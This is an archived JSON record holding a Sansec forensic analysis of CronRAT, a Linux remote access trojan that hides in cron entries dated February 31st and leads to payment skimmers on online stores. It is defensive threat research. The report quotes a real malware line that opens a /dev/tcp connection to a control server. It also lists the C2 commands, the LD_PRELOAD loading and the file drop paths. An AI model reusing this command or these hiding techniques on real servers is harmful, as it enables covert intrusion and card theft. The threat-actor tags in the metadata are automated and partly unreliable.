{
	"id": "a56fdca2-827b-48f2-a793-3d74c3eabdf7",
	"created_at": "2026-04-06T00:16:47.020235Z",
	"updated_at": "2026-04-10T03:32:46.215976Z",
	"deleted_at": null,
	"sha1_hash": "76b6e72b5508cee39eddaea84631c13bdbe8c159",
	"title": "CronRAT malware hides behind February 31st",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 410754,
	"plain_text": "CronRAT malware hides behind February 31st\r\nBy Sansec Forensics Team\r\nArchived: 2026-04-05 14:10:46 UTC\r\nAt this time of year we typically see a surge in eCommerce attacks and new malware. Last week we analyzed a\r\nclever malware attacking online stores, and today we expose another, much more sophisticated threat. It is a\r\nRemote Access Trojan (RAT) and we have named it CronRAT.\r\nSansec found CronRAT to be present on multiple online stores, among them a nation's largest outlet. Because of\r\nits novel execution, we had to rewrite part of our eComscan algorithm in order to detect it. CronRAT is currently\r\nundetected by other security vendors.\r\nCronRAT's main feat is hiding in the calendar subsystem of Linux servers (\"cron\") on a nonexistant day. This way,\r\nit will not attract attention from server administrators. And many security products do not scan the Linux cron\r\nsystem.\r\nCronRAT facilitates persistent control over an eCommerce server. Sansec has studied several cases where the\r\npresence of CronRAT lead to the injection of payment skimmers (aka Magecart) in server-side code.\r\nSansec director of threat research Willem de Groot observes:\r\nDigital skimming is moving from the browser to the server and this is yet another example. Most online\r\nstores have only implemented browser-based defenses, and criminals capitalize on the unprotected\r\nback-end. Security professionals should really consider the full attack surface.\r\nCronRAT's stealth capabilities pose a serious threat to Linux eCommerce servers:\r\nFileless execution\r\nTiming modulation\r\nAnti-tampering checksums\r\nControlled via binary, obfuscated protocol\r\nLaunches tandem RAT in separate Linux subsystem\r\nControl server disguised as \"Dropbear SSH\" service\r\nPayload hidden in legitimate CRON scheduled task names\r\nTechnical analysis\r\nhttps://sansec.io/research/cronrat\r\nPage 1 of 4\n\nThe CronRAT adds a number of tasks to crontab with a curious date specification: 52 23 31 2 3 . These lines are\r\nsyntactically valid, but would generate a run time error when executed. However, this will never happen as they\r\nare scheduled to run on February 31st. Instead, the actual malware code is hidden in the task names and is\r\nconstructed using several layers of compression and base64 decoding.\r\nThe actual payload (see raw and annotated copy) is a sophisticated Bash program that features self-destruction,\r\ntiming modulation and a custom binary protocol to communicate with a foreign control server. As one security\r\nengineer remarks:\r\nI thought I had mastered bash, but that script is giving me a headache😅\r\n— アルミ (@schrotthaufen) November 25, 2021\r\nUpon launch, it contacts the control server using an uncommon method for TCP communication:\r\neval \"exec 3\u003c\u003e/dev/tcp/796077735/$((0x1bb))\" \u0026\u003e/dev/null || exit_with_code 5\r\nhttps://sansec.io/research/cronrat\r\nPage 2 of 4\n\nThis resolves to port 443 on 47.115.46.167 , an Alibaba hosted IP. This service generates a banner for the\r\nDropbear SSH service, which is commonly installed on embedded devices. However, this is clearly a disguise.\r\nCronRAT implements a custom binary protocol with random checksums, to avoid detection by firewalls and\r\npacket inspectors.\r\nOnce a connection with the C\u0026C server is established, CronRAT takes these steps:\r\n1. Discards the fake SSH-2.0-dropbear_2017.75 banner.\r\n2. Sends a password, the cio command and then (presumably) a host identifier.\r\n3. Waits for a sd (self-destruct) or ev (eval) command from the control server\r\n4. Sends prm command and password/identifier, then receives command parameters for the sidekick RAT\r\n5. Sends dwn command and receives malicious dynamic library\r\n6. Library is saved to one of these paths: /dev/shm , /run/user/UID , /tmp , /var/tmp , HOME , with one\r\nof these file names: www-shared , server-worker-shared , sql-shared , php-shared , systemd-user.lock , php.lock , php-fpm.lock , www-server.lock , php_sess_RANDOM , zend_cache___RANDOM ,\r\nphp_cache , www_cache , worker_cahce (sic), logo_edited_DATE.png , user_edited_DATE.css ,\r\ncustom_edited_DATE.css\r\n7. Runs custom prm command with the custom library loaded via LD_PRELOAD .\r\n8. Monitors custom command for 5 seconds and, depending on success, sends ssc , ser or sun\r\ncommand.\r\n9. Finishes with cex command.\r\nhttps://sansec.io/research/cronrat\r\nPage 3 of 4\n\nThis essentially allows the RAT operator to run any code.\r\nComing up\r\nIn order to study the control server's behavior, we wrote a specially crafted RAT client to intercept commands.\r\nAnd we tricked the C2 server into sending us yet another RAT, which manages to embed itself in the Nginx web\r\nserver process. Read about NginRAT.\r\nWe greatly appreciate the help of Cipriano Groenendal at Hypernode for providing malware samples and valuable\r\nanalysis.\r\nRead more\r\nMass PolyShell attack wave hits 471 stores in one hour\r\nNovel WebRTC skimmer bypasses security controls at $100+ billion car maker\r\nPolyShell: unrestricted file upload in Magento and Adobe Commerce\r\nDigital skimmer hits global supermarket chain\r\nBuilding a faster YARA engine in pure Go\r\nSource: https://sansec.io/research/cronrat\r\nhttps://sansec.io/research/cronrat\r\nPage 4 of 4",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://sansec.io/research/cronrat"
	],
	"report_names": [
		"cronrat"
	],
	"threat_actors": [
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2",
			"created_at": "2022-10-25T16:07:24.471018Z",
			"updated_at": "2026-04-10T02:00:05.002374Z",
			"deleted_at": null,
			"main_name": "Cron",
			"aliases": [],
			"source_name": "ETDA:Cron",
			"tools": [
				"Catelites",
				"Catelites Bot",
				"CronBot",
				"TinyZBot"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "5a0483f5-09b3-4673-bb5a-56d41eaf91ed",
			"created_at": "2023-01-06T13:46:38.814104Z",
			"updated_at": "2026-04-10T02:00:03.110104Z",
			"deleted_at": null,
			"main_name": "MageCart",
			"aliases": [],
			"source_name": "MISPGALAXY:MageCart",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "3fff98c9-ad02-401d-9d4b-f78b5b634f31",
			"created_at": "2023-01-06T13:46:38.376868Z",
			"updated_at": "2026-04-10T02:00:02.949077Z",
			"deleted_at": null,
			"main_name": "Cleaver",
			"aliases": [
				"G0003",
				"Operation Cleaver",
				"Op Cleaver",
				"Tarh Andishan",
				"Alibaba",
				"TG-2889",
				"Cobalt Gypsy"
			],
			"source_name": "MISPGALAXY:Cleaver",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434607,
	"ts_updated_at": 1775791966,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/76b6e72b5508cee39eddaea84631c13bdbe8c159.pdf",
		"text": "https://archive.orkl.eu/76b6e72b5508cee39eddaea84631c13bdbe8c159.txt",
		"img": "https://archive.orkl.eu/76b6e72b5508cee39eddaea84631c13bdbe8c159.jpg"
	}
}